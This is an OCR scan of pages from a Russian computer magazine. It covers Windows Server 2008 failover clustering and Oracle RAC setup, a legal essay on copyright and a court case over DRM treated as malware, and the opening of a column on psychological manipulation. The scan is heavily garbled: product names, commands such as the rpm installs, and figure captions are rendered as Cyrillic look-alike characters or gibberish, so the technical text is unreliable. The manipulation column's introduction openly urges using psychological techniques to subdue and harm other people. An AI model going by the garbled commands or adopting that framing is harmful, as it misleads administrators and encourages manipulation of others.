с сетевыми приложениями — например, 115, ѴРЫ или межсетевым эк- 
раном. Могут возникать сложности с приложениями, которые полага- 
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ются на сессионные данные, при перенаправлении клиента на другой 
узел, на котором этих данных нет. В ЫЬВ-кластер можно включать до 
тридцати двух узлов на х64-редакциях, и до шестнадцати — на х86. 
Раі1оѵегс1и5і:егіп§ — это кластеризации с переходом по отказу, хотя 
довольно часто термин переводят как «отказоустойчивые кластеры». 
Узлы кластера объединены программно и физически с помощью 
ЬАЫ- или ѴѴАЫ-сети, для тиШ-зйе кластера в ѴѴіпсІоѵѵз Вегѵег 2008 
убрано требование к общей задержке 500 мс, и добавлена возмож- 
ность гибко настраивать йеапЪеаР В случае сбоя или планового 
отключения сервера кластеризованные ресурсы переносятся на 
другой узел. В Етегргізе есШоп в кластер можно объединять до шест- 
надцати узлов, при этом пятнадцать из них будут простаивать до тех 
пор, пока не произойдет сбой. Приложения без поддержки кластеров 
(сІшГег-ипаѵѵаге) не взаимодействуют со службами кластера и могут 
быть переключены на другой узел только в случае аппаратного сбоя. 
Приложения с поддержкой кластеров (с1и$і:ег-аѵѵаге), разработанные 
с использованием СІизіегАРІ, могут быть защищены от программных 
и аппаратных сбоев. 

Развертывание {аііоѵег-кластера 

Процедуру установки кластера можно разделить на четыре эта- 
па. На первом этапе необходимо сконфигурировать аппаратную 
часть, которая должна соответствовать ТЪе МісгозоіД ВирроП: Роіісу 
іЪг ѴѴіпсІоѵѵз Вегѵег 2008 Раііоѵег СІизГегз. Все узлы кластера долж- 
ны состоять из одинаковых или сходных компонентов. Все узлы 
кластера должны иметь доступ к хранилищу, созданному с исполь- 
зованием РіЪгеСЬаппеІ, І5С8І или Вегіаі АНасЬеб 5С5І. От хранилищ, 
работающих с ѴѴтсІоѵѵз Вегѵег 2008, требуется поддержка регзізіепі: 
гезегѵагіош. 



На втором этапе на каждый узел требуется добавить компонент 
Раііоѵег С1ші:егіп§ — например, через Вегѵег Мапа^ег. Эту задачу 
можно выполнять с использованием учетной записи, обладающей 
административными правами на каждом узле. Серверы должны 
принадлежать к одному домену. Желательно, чтобы все узлы клас- 
тера были с одинаковой ролью, причем лучше использовать роль 
тетЪег зегѵег, так как роль ботаіп сопітоііег чревата возможными 
проблемами с ЭЫВ и Ехсйап^е. 

Третий не обязательный, но желательный этап заключается в про- 
верке конфигурации. Проверка запускается через оснастку Раііоѵег 
СІшГег Мапа^етеШ:. Если для проверки конфигурации указан только 
один узел, то часть проверок будет пропущена (рис. 1) . 

На четвертом этапе создается кластер. Для этого из Раііоѵег СІшГег 
Мапа^етепі: запускается мастер Сгеаіе Сіизііег, в котором указывают- 
ся серверы, включаемые в кластер, имя кластера и дополнительные 
настройки ІР-адреса. Если серверы подключены к сетям, которые не 
будут использоваться для общения в рамках кластера (например, 
подключение только для обмена данными с хранилищем), то в свойс- 
твах этой сети в Раііоѵег СІизЩг Мапа^етеШ: необходимо установить 
параметр «Эо поі: аііоѵ/ йіе сішгег ш ше гіііз пеГѵѵогк». 

После этого можно приступить к настройке приложения, которое 
требуется сконфигурировать для обеспечения его высокой доступ- 
ности. Для этого необходимо запустить Ні§Ь АѵаіІаЬіІПу ѴѴігагсІ, 
который можно найти в Вегѵісез апб Арріісагіопз оснастки Раііоѵег 
СІшГег Мапа^етеШ: (рис. 2) . 

СІизІег ЗНагесІ Ѵоіитез 

В случае Раііоѵег- кластера доступ к ШЛ, хранящему данные, может 
осуществлять только активный узел, который владеет этим ресурсом 
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Рис. 1. Проверка конфигурации {аііоѵег-кластера 



(рис. 3) . При переключении на другой узел происходит размонти- 
рование ЫЖ и монтирование его для другого узла. В большинстве 
случаев эта задержка не является критичной, но при виртуализации 
может требоваться вообще нулевая задержка на переключение вир- 
туальных машин с одного узла на другой. 

Еще одна проблема, возникающая из-за того, что ІДЖ является ми- 
нимальной единицей обхода отказа, заключается в том, что при сбое 
одного приложения, находящегося на ІДЖ, приходится переключать 
все приложения, которые хранятся на этом ІДЖ, на другой сервер. Во 
всех приложениях (включая Нурег-Ѵ до второго релиза Зегѵег 2008) 
это удавалось обходить за счет многочисленных ІДЖ, на каждом 
из которых хранились данные только одного приложения. В Зегѵег 
2008 К2 появилось решение для этих проблем, но предназначенное 
для работы только с Нурег-Ѵ и СЗѴ (Сіи$1:ег ЗЬагеб Ѵоішпез) . СЗѴ 
позволяет размещать на общем хранилище виртуальные машины, 
запускаемые на разных узлах кластера — тем самым разбивает- 
ся зависимость между ресурсами приложения (в данном случае 
виртуальными машинами) и дисковыми ресурсами. В качестве 
файловой системы С8Ѵ использует обычную РГГРЗ. Для включения 
С8Ѵ необходимо в Раііоѵег СІшГег Мапа^е выполнить команду ЕпаЫе 
СІшГег ЗЬагеб Ѵоіитез. Отключить поддержку СЗѴ можно только 
через консоль: 

ОеГ-СІизГег | % { $_. ЕпаЫеЗЬагесіѴоІишез = "БізаЫесі"} 

Для использования этой команды должен быть загружен Раііоѵег 
СІизГегБ, модуль РоѵѵегЗЬеІІ. Использование СЗѴ совместно с Ііѵе 
ті^гагіоп позволяет перемещать виртуальные машины между физи- 
ческими серверами в считанные миллисекунды, без обрыва сетевых 
соединений и совершенно прозрачно для пользователей. Стоит отме- 
тить, что копировать любые данные (например, готовые виртуальные 
машины) на общие диски, использующие СЗѴ, следует через узел-коор- 
динатор. Несмотря на то, что общий диск доступен со всех узлов класте- 



ра, перед записью данных на диск узлы запрашивают разрешение у уз- 
ла-координатора. При этом, если запись требует изменений на уровне 
файловой системы (например, смена атрибутов файла или увеличение 
его размера) , то записью занимается сам узел-координатор. 

Огасіе РАС 

Огасіе Кеаі Арріісагіоп СІизГегз (НАС) — это дополнительная опция 
Огасіе ПашЬазе, которая впервые появилась в Огасіе ПашЪазе 9і 
под названием ОРЗ (Огасіе Рагаііеі Зегѵег). Опция предоставляет 
возможность нескольким экземплярам совместно обращаться 
к одной базе данных. Базой данных в Огасіе ПашЪазе называет- 
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іесЬпеіѵѵогк/сІаіаЬаге/сІизіегіпд/оѵегѵіеѵѵ/іпсІех.ЫппІ : 

• Документация и дистрибутивы Огасіе Сіизіегѵѵаге и Огасіе 
ОгісІ Іпітагігисіиге: огасІе.сотАесбпеіѵѵогк/сІаіаЬазе/ 
сіизіегѵѵаге/оѵегѵіеѵѵ/іпбех.біті : 

•Настройка Огасіе Сіизіегѵѵаге для защиты Зіпдіе Іпзіапсе 
Огасіе ОаіаЬазе 1 1д: огасІе.сотЛесбпеіѵѵогк/баіаЬазе/зі-бЬ- 
Іаііоѵег-1 1д-134623.рбР 
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Рис. 2. НідЬ аѵаіІаЬіІИу ѵѵігагсі 

ся совокупность файлов данных, журнальных файлов, файлов 
параметров и некоторых других типов файлов. Для того, чтобы 
пользовательские процессы могли получить доступ к этим данным, 
должен быть запущен экземпляр. Экземпляр (іпзГапсе) в свою 
очередь состоит из структур памяти (ЗСА) и фоновых процессов. В 
отсутствии КАС получить доступ к базе данных может строго один 
экземпляр. 

Опция КАС не поставляется с Етегргізе Есійіоп и приобретается 
отдельно. Стоит отметить, что при этом КАС идет в составе Згапсіагсі 
Есійіоп, но данная редакция обладает большим количеством огра- 
ничений по сравнению с ЕпСегргйе Есіігіоп, что ставит под сомнение 
целесообразность ее использования. 

Огасіе ОгісЯ Іпйазйисігіге 

Для работы Огасіе КАС требуется Огасіе СІизЩгѵѵаге (или стороннее 
ПО) для объединения серверов в кластер. Для более гибкого управ- 
ления ресурсами узлы такого кластера могут быть организованы 
в пулы (с версии 1 1§ К2 поддерживается два варианта управления 
— на основании политик для пулов или, в случае их отсутствия, адми- 
нистратором) . Во втором релизе 1 1§ Огасіе СІшГегѵѵаге был объеди- 
нен с АЗМ под общим названием Огасіе Сгісі Іпітазітистге, хотя оба 
компонента и продолжают устанавливаться по различным путям. 
АиШтагіс Зюга^е Мапа^етепі: (АЗМ) — менеджер томов и файловая 
система, которые могут работать как в кластере, так и с зіп^іе- 
іпзСапсе базой данных. АЗМ разбивает файлы на АЗМ АПосагіоп Шй. 
Размер АПосагіоп Шй определяется параметром АІІ_ЗІ2Е, который 
задается на уровне дисковой группы и составляет 1, 2, 4, 8, 16, 32 или 
64 МВ. Далее АПосагіоп Шйз распределяются по АЗМ-дискам для 
балансировки нагрузки или зеркалирования (рис. 4) . Избыточность 
может быть реализована, как средствами А8М, таки аппаратно. 
АЗМ-диски могут быть объединены в Еаііиге Сгоир (то есть группу 
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дисков, которые могут выйти из строя одновременно — например, 
диски, подсоединенные к одному контролеру), при этом зеркали- 
рование осуществляется надиски, принадлежащие разным Еаііиге 
Сгоир. При добавлении или удалении дисков АЗМ автоматически 
осуществляет разбалансировку, скорость которой задается админис- 
тратором. На АЗМ могут помещаться только файлы, относящиеся к 
базе данных Огасіе, такие как управляющие и журнальные файлы, 
файлы данных или резервные копии КМАЫ. Экземпляр базы данных 
не может взаимодействовать напрямую с файлами, которые разме- 
щены на АЗМ. Для обеспечения доступа к данным дисковая группа 
должна быть предварительно смонтирована локальным АЗМ-экзем- 
пляром. Огасіе рекомендует использовать АЗМ в качестве решения 
для управления хранением данных вместо традиционных менедже- 
ров томов, файловых систем или КАѴѴ-устройств. 

Рис. 3. РаіІоѵег_сІиз*ег 
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Рис. 4. А5ЛЛ сіізк дгоир 



Развертывание Огасіе РАС 

Рассмотрим этапы установки различных компонентов, необходимых 
для функционирования Огасіе НАС в режиме асгіѵе/асгіѵе кластера с 
двумя узлами (рис. 7) . В качестве дистрибутива будем рассматривать 
последнюю на момент написания статьи версию Огасіе ПаіаЪазе 
1 1§ Кеіеазе 2. В качестве операционной системы возьмем Огасіе 
Епіегргізе Ілпих 5. Огасіе Епіегргізе Ілпих — операционная система, 
базирующаяся на КесІНаІ Епіегргізе Ілпих. Ее основные отличия — 



цена лицензии, техническая поддержка от Огасіе и дополнительные 
пакеты, которые могут использоваться приложениями Огасіе. 
Подготовка ОС к установке Огасіе стандартна и заключается в 
создании пользователей и групп, задании переменных окружения и 
параметров ядра. Параметры для конкретной версии ОС и БД можно 
найти в Ішіаііагіоп Сиісіе, который поставляется вместе с дистрибу- 
тивом. 

На узлах должен быть настроен доступ к внешним общим дискам, 
на которых будут храниться файлы базы данных и файлы Огасіе 
Сіизіепл/аге. К последним относятся ѵоііп^сіізк (файл, определя- 
ющий участников кластера) и Огасіе Сіизіег Ке^ізігу (содержит 
конфигурационную информацию — например, какие экземпляры 
и сервисы запущены на конкретном узле) . Рекомендуется создавать 
нечетное количество ѵогіп^сіізк. Для создания и настройки А5М- 
дисков желательно использовать АБМІлЪ, которую надо установить 
на всех узлах: 

# грт -Х]ѵЪ огасІеазт-зиррогР-2 . 1 . 3 -1 . е14 . х8б_64 . грт 

# грт -ШлЬ огас1еазт1іЬ-2 . О . 4-1 . е14 . х8б_б4 . грт 

# грт -ІІѵЪ. огас1еазт-2 . б . 9-55 .0.12. ЕЬзтр-2 .0.3-1. 

х86_64 . грт 

Кроме интерфейса для взаимодействия с хранилищем на узлах 
желательно настроить три сети — Іпіегсоппесі:, Ехіегпаі и Васкир. 
Необходимо настроить ІР-адресацию (вручную или с использова- 
нием Огасі е СЫ8) и ПЫ5 для разрешения всех имен (или только 
СИ5). 

Вначале осуществляется установка Сгісі ІпІгазігисШге. Для этого 
загружаем и распаковываем дистрибутив, затем запускаем 
установщик (рис. 5) . В процессе установки необходимо указать 
имя кластера; указать узлы, которые будут входить в кластер; 
указать назначение сетевых интерфейсов; настроить хранилище. 

В конце нужно выполнить с правами гооі скрипты огаіпзіКооІ.зІі и 
гооі.зіі. Первым на всех узлах выполняется скрипт огаішіКооІ.зЬ, 
причем запуск на следующем узле осуществляется только после 
завершения работы скрипта на предыдущем. После выполнения 
огаішіКооі.зІі последовательно на каждом узле выполняется гооі. 
8Іі. Проверить успешность установки можно с помощью команды: 
/и01/дгісІ/Ъіп/сгзс1:1 сЬеск сІизЕег -аіі 
Выполнив проверку, можно приступать к установке базы данных. 
Для этого запускаем Огасіе Шіѵегзаі іпзіаііег (рис. 6), который 
используется и для обычной установки базы. 



Рис. 5. Установка ОгасІебгісІ Іггігазігисіиге 



5е!ей ІгтзІІаііоп Орііоп 



т 

т 

т 

'Г - 



ІІНІКІІДПйН ОрТІЙИ 




_ О А Т А а А е Ё 

5«*а шѵ 01 |Ц* іщт*ІЦті ол орліолі 

ІгшаІІ іпй СопгЛ диге Огасіе Спй Іп^іЛпісШге Гпг і ^ІисіЕГ 

Согт^дига Огасіе Сгігі ІпГгіЛпісІщ Іаг а ^іапсіаійпе $егѵёг 

ПрдгаЛ* Огасіе С Нгі ІлГгвдшсіигй огОпгк Аілстаі^ Мап&дапцлі 

іпяш огаек ігсггангисште: ооіѵ 



► 126 



ХАКЕР 03 /146/ 201 1 




N0(1 с 5 сісс*іоп 



Т 

■т 

'Г- 

У 



іллзНиіап Орлов 
СкН ОрГійгН 
ІЧІЧНТѴйЕ 




оРАсье- 

0АТАВА5І 



11 * 



5іі«еі ИПі курс 0 іі*Ькес ІпкІІІІМІопуйитпЧ Ій р«Копті, 

З-іпрІс ^пгГіл« сім\Ьіг* іпзтаііатіоп 

- АррІІСІІі&П СІШІНІ 0&Т4ЬЛ5<: ііШЫШкОП 

л<?0*г а№м?л го-тіъ« ІсчіІ пиІ*> іп іКі Оия«гч*чге йі« 1пт1яег*Ьд-и10 іпя*Л Опсі* 

ЙАС 

N00* мыл Г 



пдмі 
3 лроіг 



2Ш ^огшсСІіѵПу . 



5*І«І АН РсЛгкН АН 



Рис. 6. Огасіе 11д Р2 ипіѵегзаі іпгіаііег 



Кроме асгіѵе/асгіѵе-кластера в версии 11§ К2 существуют две 
возможности для создания асгіѵе/раззіѵе-кластера. Одна из них 
— Огасіе КАСОпеЫобе. Другой вариант не требует лицензии для 
НАС и реализуется средствами Огасіе Сіизіюгѵѵаге. В этом случае 
вначале создается общее хранилище; затем устанавливается Сгісі 
ІпітазІтисШге, с использованием А5М_СК5 и 5САЫ; а после этого 
на узлы устанавливается база данных в варианте 5і:апба1опе. Да- 
лее создаются ресурсы и скрипты, которые позволяют запускать 
экземпляр на другом узле в случае недоступности первого. 



Заключение 

Огасіе КАС совместно с Огасіе Сгісі ІпітазтісШге позволяют 
реализовать разнообразные сценарии построения кластеров. 
Гибкость настройки и широта возможностей компенсируются 
ценой такого решения. 

Решения же Місгозоіі: ограничены не только возможностями са- 
мой кластеризации, но и продуктами, которые могут работать в 
такой среде. Хотя стоит отметить, что набор таких продуктов все 
равно шире, чем одна база данных, □с 



Рис. 7. Огасіе РАС с двумя узлами 




Огасіе вас 






N0(1*2 



Ауіопаііс 5'сгэее 
Манате тппі 



Огасіе СІигіегшлге 



Экземпляр 


$СА 


ФОНОЛ*** 

процессы 



Экземпляр 


50А 


Фоновый 

процессы 



ХАКЕР 03 /146/ 201 1 



► 127 







ЗУИ/АСК 



■ ■ Н.Н. Федотов, гл. аналитик компании ІпІоѴѴаІсЬ 



Копилефт 
наносит 
ответный удар 

Современные тенденции защиты авторского 
права в контексте «Дела Жукова» 

Дело Жукова (оно же «Магаданское дело») — это первая, обреченная на увядание попытка 
поставить барьер необоснованному расширению копирайта. 



За что воюют? 

Как известно, авторское право (и даже шире — право интеллек- 
туальной собственности) есть временная монополия, искус- 
ственно введенная ради развития наук и искусств. Обычное 
право собственности (так называемая вещная собственность) 
известно столько, сколько существует цивилизация. 

Его не выдумывали и не вводили указом. Вещная собственность 
— так называемое естественное право, то есть, оно возника- 
ет стихийно и в обязательном порядке везде, где появляется 
человеческая цивилизация. Не будем сейчас останавливаться 
не механизме (как именно чувство собственности завязано на 
инстинкты приматов), просто отметим, что вещная собствен- 
ность — естественна, прошита в мозгу «на аппаратном уровне». 
А интеллектуальная собственность — искусственна, базиру- 
ется лишь на государственном принуждении. Первые робкие 
намеки на нее появились в XVI веке, в качестве полноценного 
института она введена лишь в XIX, а в большинстве стран — и 
вовсе в XX веке. 

Неудивительно, что в сознании людей интеллектуальная собс- 
твенность (в частности, авторское право) не находит аппарат- 
ной поддержки и до сих пор выглядит непривычно. Она закреп- 
лена в законах всех стран, но еще не внедрилась в мораль. 

Для вещной собственности характерен обратный путь: от 
морали к закону. Сначала люди неосознанно защищали 
«свое», затем возникли религиозно-моральные запреты на 
хищение чужого, и лишь потом человечество придумало та- 
кую технологию, как писаный закон и закрепило в нем давно 
сложившийся принцип «не укради». Авторское право сначала 
придумали законодатели, вписали в кодексы и лишь потом 
озаботились объяснить простым людям, почему нехорошо 
заимствовать тексты и музыку. Авторское право с самого 
начала рассматривалось как «вынужденное зло», как комп- 
ромисс между интересами авторов, посредников и общества 
ради материальной поддержки творчества, но не в ущерб 
культуре и науке в целом. 

Внедрение авторского права в мораль идет с трудом. Но идет 
неуклонно. Очень помогает подмена понятий: нарушение прав 
интеллектуальной собственности пропагандисты именуют 
«кражей» и «воровством», проводя несуществующие параллели 
и пытаясь найти опору в древних инстинктах. 



Куда дует ветер 

С момента введения понятия «авторское право» полномочия 
правообладателей постоянно расширялись. Взять хотя бы срок 
охраны произведения. Сначала дарованная авторам монополия 
длилась четырнадцать лет, затем была увеличена до тридцати, 
пятидесяти, потом ее сделали пожизненной, затем продлили 
еще на двадцать, тридцать, пятьдесят лет. Ныне авторское 
право охраняет произведение весь срок жизни автора плюс 
пятьдесят лет в Европе. А в США, России и некоторых других 
странах — весь срок жизни плюс семьдесят лет. Идут разговоры 
и о дальнейшем продлении. 

Также постоянно расширяется объем прав правообладателя, 
перечень видов использования, которые он вправе разрешать и 
запрещать. А случаи свободного использования произведений 
(цитирование, использование в личных целях, во имя обще- 
ственных интересов и тому подобное) — напротив, сужаются и 
обставляются новыми условиями. 

Изначальный компромисс и баланс интересов авторов, пос- 
редников и общества давно потерян. Явный перекос законов в 
пользу посредников уже не способствует, а препятствует техни- 
ческому прогрессу и художественному творчеству. 

Ничего удивительного в том, что закон катится лишь в одну 
сторону — ветер дует в единственном направлении. Интересы 
главных правообладателей — богатейших транснациональных 
корпораций — лоббируются на доходы от их интеллектуаль- 
ной собственности. А интересы другой стороны лоббировать 
некому и не на что. Потребители произведений разобщены 
и не имеют финансовых потоков, которые можно было бы 
задействовать. А для политической партии интеллектуальная 
собственность — слишком мелкая проблема, чтобы строить на 
ней выборную стратегию. Да и осознание публикой своих инте- 
ресов в области авторского права идет крайне медленно, если 
вообще идет: пропаганда оплачивается лишь «той» стороной. 

ТСЗ АП как оружие 

Одним из нововведений в институт авторского права является 
охрана законом технических средств защиты авторских прав 
(ТСЗАП), также известных под именем И КМ (Иі^ПаІ 
Мапа^етеШ: — управление [авторскими] правами в цифровой 
форме). ТСЗАП вовсе не обязаны реально препятствовать не- 
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правомерному использованию произведений. Ключ активации, 
привязка к СЭ, словесное предупреждение, обфускация кода, 
отключение пункта меню «заѵе аз» — все это виды ТСЗАП. Доста- 
точно обозначить запреты. Они похожи не на замок, а на печать: 
преодолеть несложно, однако чревато наказанием. В отношении 
ТСЗАП запрещено не только применение, но вообще все, что 
законодатель смог вспомнить: «изготовление, распространение, 
сдача в прокат, предоставление во временное безвозмездное 
пользование, импорт, реклама» (ст. 1299 ГК). Даже если ТСЗАП 
«превышают полномочия» и препятствуют тем действиям поль- 



зователя, которые разрешены в силу закона, эти запреты тоже за- 
прещено преодолевать (до 4 октября 2010 года было разрешено, 
однако последние поправки в ГК убрали этот атавизм свободы) . 

Ортогональные права 

Тем не менее, ТСЗАП не всегда действуют верно. Кроме права 
интеллектуальной собственности есть и иные отрасли — ин- 
формационное право, в частности. Отрасли эти ортогональны, 
отношения в каждой из них регулируются независимо (см. 
таблицу). 
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5ѴМ/АСК 



Иногда законная защита своих интересов может нарушать права иных лиц в другой об- 
ласти. Применение ТСЗАП всегда законно с точки зрения АП. Однако в другом измерении 
(права на информацию) они могут преступить черту. 



АВТОРСКОЕ ПРАВО 




ПРАВО НА ИНФОРМАЦИЮ 



ЗАКОННО 



Правообладатели, вдохновленные государственной защитой их 
интересов, порою забываются и превышают даже те широчай- 
шие полномочия, которые расстелил перед ними законодатель. 
Те же ТСЗАП вполне могут оказаться вредоносными программа- 
ми. Понятие «вредоносная программа» (ст. 273 УК) сформулиро- 
вано целиком и полностью в терминах информационного права, 
к авторскому не имеет отношения, поэтому статус ТСЗАП и 
статус вредоносной программы для какого-либо ПО независимы 
и вполне сочетаемы. Однако совмещались они редко. 

Для начала следует вспомнить скандал с ПКМ-системой ХСР 
фирмы 5опу ВМС . Для контроля использования фонограмм, 
распространяемых на компакт-дисках, при помещении диска в 
привод автоматически запускалась программа «защиты», кото- 
рая через использование уязвимости ОС получала права адми- 
нистратора (да-да, типичный руткит), прописывалась в реестре 
и начинала «контролировать» свою музыку. Защита авторских 
прав — хорошо и правильно, но такая благородная цель не оп- 
равдывает любые средства. Средства не должны нарушать иных 
норм, в частности, норм о защите информации. Пользователь 
имеет право на безопасное пользование своим компьютером, 
каналами связи и на сохранность своей собственной информа- 
ции, каковые права защищает 28 глава УК (ст. 272-274) . 



Описанный случай с Зопу ВМС российская Фемида предпочла 
не заметить: хлопот много, выгоды никакой, да и потерпевшие 
заявлений не писали. Но в «Магаданском деле» заинтересованные 
лица нашлись. 

Самый наглый 

Фабулу «Магаданского дела» ты, очевидно, помнишь. Средства 
защиты авторских прав, которые избрал подсудимый Жуков, не 
только защищали его программу от неразрешенного использо- 
вания (за пределами срока действия лицензионного договора) , 
но и блокировали информацию пользователя — бухгалтерские 
данные. 

Обвинение и защита спорят относительно этого «блокирова- 
ния». Ситуация действительно неоднозначная. С одной стороны, 
отключение некоторых функций бухгалтерской программы 
препятствует доступу к ранее введенным данным пользовате- 
ля. С другой стороны, данные эти никуда не деваются, лежат на 
диске в бЪТ-файлах и могут быть прочитаны иными программа- 
ми. С одной стороны, за пределами оплаченного срока лицензии 
автор пользователю ничего не должен, ничего не обещал и даже 
заранее предупредил об окончании сроков. С другой стороны, ра- 
зобрать ЭВР, найти нужные поля и извлечь оттуда свою информа- 
цию — задача непосильная для бухгалтера, она и айтишнику-то 
под силу чисто теоретически, на практике будет дешевле собрать 
и ввести все данные с чистого листа. Обвинение признало такие 
действия «блокированием», а программу — вредоносной. 
Независимо от того, поддержат ли приговор в более высоких инс- 
танциях или нет, правообладателям дан сигнал: не зарывайтесь! 
Цель не оправдывает средства. Защищая свои права, не посягайте 
на права пользователя. 

Конечно, программист-одиночка из Магадана — это вам не 
транснациональная корпорация, на которую наехать не хватит 
духу у низового суда. Даже у Верховного — вряд ли. Классик 
русской поэзии про этот случай писал: «Но есть и Божий суд, 
наперсники разврата!». Юристы верующие и юристы-атеисты по- 
нимают, что решения судов бывают основаны не на законе, а оп- 
ределены иными соображениями, но как квалифицируется дело 
«по гамбургскому счету», они видят. А по нему-то программист 
явно переборщил со своей «защитой», парализовав деятельность 
бухгалтерий целого ряда предприятий. Созданная при этом обще- 
ственная опасность заведомо превышает предотвращенную. 
Положительный пример, который здесь можно припомнить, — 



ТСЗАП: юридическая квадратура технического круга 




Ограничение ТСЗАП 



Действия, 

разрешенные 

правообладателем 



Действия, 
разрешенные 
в силу закона 



► 130 



ХАКЕР 03 /146/ 201 1 







Определение вредоносной 
программы 



Каноническое определение вредоносной программы (ст. 273УК): 
Вредоносная программа — программа для ЭВМ, заведомо 
приводящая к несанкционированномууничтожению, блокирова- 
нию, модификации либо копированию информации, нарушению 
работы ЭВМ, системы ЭВМ или их сети. 

Развернутое определение вредоносной программы: 

Вредоносной следует считать программу для ЭВМ, объективным 
свойством которой является ее способность осуществлять не- 
разрешенные обладателем информации уничтожение, блокиро- 
вание, модификацию либо копирование этой информации или 
неразрешенные оператором информационной системы наруше- 
ния работы этой информационной системы (ЭВМ, системы ЭВМ 
или их сети), причем те и другие действия — безучастия (то есть 
без явной или неявной команды) вышеуказанных субъектов. 

поведение ТСЗАП программ шифрования типа РСРсІізк. После 
истечения срока разрешенного использования они предоставля- 
ют доступ к зашифрованным данным в режиме «только чтение». 
Этого достаточно, чтобы продолжать работу с любыми старыми 
данными. А также сохранять новые, но уже без шифрования. Ни- 
каким «блокированием» чужой информации при таком раскладе 
даже не пахнет. 

До победного конца 

На сегодняшний день не видно предпосылок, чтобы ситуация 
с авторскими правами изменилась. Указанный выше перекос 
баланса пока не угрожает существенным интересам общества. 
Пока негативные последствия просто накапливаются. Крупные 
правообладатели оказываются в заложниках созданной ими же 
ситуации. Чтобы не допустить снижения финансовых потоков, 
они просят власть вводить новые и новые ограничения для поль- 
зователей, продлевать сроки охраны, ужесточать наказания для 
нарушителей. Слезть с иглы монополии почти невозможно. Мо- 
нопольные сверхдоходы неизбежно поддерживают государствен- 
ную охрану монополии, а та, в свою очередь, еще увеличивает 
монопольную прибыль. Прибыль правообладателей со временем 
перестает зависеть от общественной пользы и выпадает из ры- 
ночных отношений. Правообладатели неизбежно скатываются от 
полезной общественной роли к паразитической. 

Однако в зависимость от защиты интеллектуальной собственнос- 
ти попадают не только корпорации, но и государства. Те, которые 
этой интеллектуальной собственности больше производят, чем 
потребляют. Малейшее ослабление защиты сразу сказывается на 



внешнеторговом балансе. А радикальное сокращение охраны, 
за которое ратуют некоторые правозащитники, привело бы к па- 
дению доходов в разы. Например, США импортируют множество 
натуральных ресурсов, а экспортируют в основном виртуальные: 
капитал, доллары, услуги, авторские права, патенты. Сокраще- 
ние тех же сроков охраны сразу приведет к недополучению мил- 
лиардов долларов. Бюджет США, и без того сильнодефицитный, 
может этого не выдержать. 

Интеллектуальная собственность, в отличие от вещной, требует 
весьма специфической охраны. Чтоб защитить материальный 
объект, достаточно установить нужный режим (физический и 
правовой) там, где локализован объект. Например, запереть 
дверь, посадить сторожа. А чтобы защитить свою интеллектуаль- 
ную собственность, требуется установить одинаковые законы во 
всем мире. Это требует мирового господства. И весьма затратно. 
Затраты надо окупать, следовательно, ужесточать охрану, рас- 
пространять ее на все новые и новые области, в которых у стра- 
ны-гегемона производство превышает потребление. Например, 
на селекционные достижения и достижения генной инженерии, 
что и было недавно сделано. 

А «украсть» чужую интеллектуальную собственность несрав- 
ненно проще, чем похитить собственность обычную. Для этого 
не нужно вторгаться на чужую территорию и нарушать чужие 
законы. Достаточно снять охрану на собственной территории, по 
собственным суверенным законам. И пожалуйста — деньги наши 
больше не ваши. Именно поэтому государственный суверени- 
тет несовместим с постиндустриальным обществом. Именно 
поэтому местные законы — больше не внутреннее дело страны, а 
покушение на чужие интересы. 

Чего надо бояться 

«Магаданское дело» — довольно опасный прецедент. Он может 
насторожить правообладателей, которые, разумеется, примеряют 
на себя роль Жукова. Сегодня осудили программиста-одиночку, а 
завтра — заведут дело на солидную фирму. И, возможно, запретят 
применять некоторые виды ТСЗАП. Это снизит собираемость 
лицензионных платежей. Доходы окажутся под угрозой. 

Подобный ход рассуждений ведет к тому, что влиятельные пра- 
вообладатели станут добиваться иммунитета от 273-й статьи — 
права применять такие технические средства защиты, какие им 
захочется. И баланс интересов авторов, посредников и общества 
еще больше перекосится. 

И другой вывод из «Магаданского дела», который должны сделать 
для себя программисты, таков: ни один, даже самый мелкий, про- 
ект сейчас не обойдется без юриста. Технарю почти невозможно 
самостоятельно защитить свои права, не задев при этом чужие. 
Шаг вправо — виновен, шаг влево — обворован. А единственная 
законная тропинка — узенькая и, чего греха таить, кривоватая, ц-ц 



Разные термины разграничивают разные отрасли права. Смешение терминов - это попытка натянуть неприменимые 
законы. Например, невозможно украсть произведение, но только нарушить авторские права на него. У информации 
не бывает владельца, но только обладатель. Невозможно запатентовать информацию. Перечисленные пары терминов 
неприложимы друг к другу. 



Собственность 


Интеллектуальная собственность 


Информационное право 


Владелец 


Правообладатель 


Обладатель 


Вещь 


Произведение 


Информация 


Хищение, 
кража, грабеж, 
мошенничество 


Нарушение авторских прав, нарушение 
патентных прав, нарушение прав на 
товарный знак 


Нарушение прав на информацию, разглашение, неправомер- 
ный доступ 
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ІЛЧІТ5 



Оксана «Огіуапа» Андреева опуапаОхрзусНо.ги 




Р5УСН0: 

ФАНТОМНЫЕ НИТИ УПРАВЛЕНИЯ СОЗНАНИЕМ 

Бессознательные эффекты и иллюзии в арсенале опытного манипулятора 

Каждый искусный манипулятор знает: чем глубже в недрах бессознательного спрятан 
психический процесс, чем меньше знает о нем человек, тем лучше нужно его изучить, 

чтобы добиться добровольного подчинения. 



Целые поколения и школы психологов, 
финансируемые такими манипуляторами, 
стараются, проводят исследования, опыты 

— и все для того, чтобы ты беспрепятствен- 
но мог изучать потайные ходы человече- 
ской психики, используя их на благо себе и 
во вред тому, кто посмеет встать на твоем 
пути. 

Защитные 
механизмы психики 

Защитный механизм психики (ЗМП) — это 
процесс, происходящий внутри психики. 

Мы не осознаем его, но он диктует свои 
правила. Его роль, во-первых, защитная 
(оградить сознание от болезненных пере- 
живаний, поступающих извне или из под- 
сознания), а во-вторых — адаптационная 
(помочь не перегружать сознание необя- 
зательной информацией и анализом). ЗМП 
действуют на бессознательном (неосозна- 
ваемом) уровне и искажают или отрицают 
настоящее. Допустим, есть неприятное 
воспоминание о некорректно пройденной 
ситуации: остался страх, стыд, вина (по 
мнению большинства психологов, ЗМП 
включается именно в случае воздействия 
этих трех эмоций); такое воспоминание 
причиняет эмоциональную боль, травмируя 
психику. И тут на помощь приходит ЗМП 

— он помогает оградить сознание от бес- 
сознательных травмирующих переживаний: 
человек либо оправдывает сам себя (мора- 
лизация, рационализация), либо забывает 
(вытеснение, подавление), либо вообще не 
признает, что такое случилось (отрицание), 
либо, либо, либо... 



имитивная 



Пр 
изоля 
в фан 



№зиГ А 



Попытка уйти от напряжения в мечты, 
радужное выдуманное пространство. Живет 
себе человек, ничего из себя не представ- 
ляет, ничего в жизни не добился и пони- 
мает, что вряд ли добьется с такой силой 
воли и целеустремленностью... Конечно, это 
понимание не может радовать, оно может 
только огорчать; а огорчаться не хочется... 
